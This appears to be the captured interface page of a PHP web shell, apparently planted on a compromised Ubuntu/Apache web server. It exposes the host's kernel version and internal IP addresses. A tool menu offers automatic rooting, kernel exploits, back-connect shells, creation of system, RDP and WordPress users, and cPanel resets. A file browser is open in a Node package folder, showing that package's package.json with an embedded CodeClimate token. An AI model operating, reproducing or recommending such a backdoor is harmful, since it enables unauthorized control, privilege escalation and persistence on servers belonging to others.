Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
ps-tree /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxrwxr-x
CHANGELOG.md
172
B
-rw-rw-r--
LICENSE
1.09
KB
-rw-rw-r--
README.md
3.26
KB
-rw-rw-r--
index.js
3.06
KB
-rwxrwxr-x
package.json
1.26
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "ps-tree", "version": "1.2.0", "description": "Get all children of a pid", "license": "MIT", "homepage": "http://github.com/indexzero/ps-tree#readme", "repository": "github:indexzero/ps-tree", "bugs": { "url": "https://github.com/indexzero/ps-tree/issues", "email": "charlie.robbins@gmail.com" }, "author": "Charlie Robbins <charlie.robbins@gmail.com>", "contributors": [ "Zhuohuan LI <zixia@zixia.net> (https://github.com/zixia)", "Simone Primarosa <simonepri@outlook.com> (https://github.com/simonepri)" ], "keyboards": [ "ps-tree", "ps", "tree", "ppid", "pid" ], "main": "index.js", "bin": { "ps-tree": "./bin/ps-tree.js" }, "files": [ "bin", "index.js" ], "engines": { "node": ">= 0.10" }, "scripts": { "test": "istanbul cover node_modules/tape/bin/tape test/test.js", "coverage": "cross-env CODECLIMATE_REPO_TOKEN=84436b4f13c70ace9c62e7f04928bf23c234eb212c0232d39d7fb1535beb2da5 node_modules/.bin/codeclimate-test-reporter < coverage/lcov.info" }, "dependencies": { "event-stream": "=3.3.4" }, "devDependencies": { "codeclimate-test-reporter": "^0.5.0", "cross-env": "^2.0.1", "istanbul": "^0.4.5", "tape": "^4.9.0", "tree-kill": "^1.1.0" } }
Close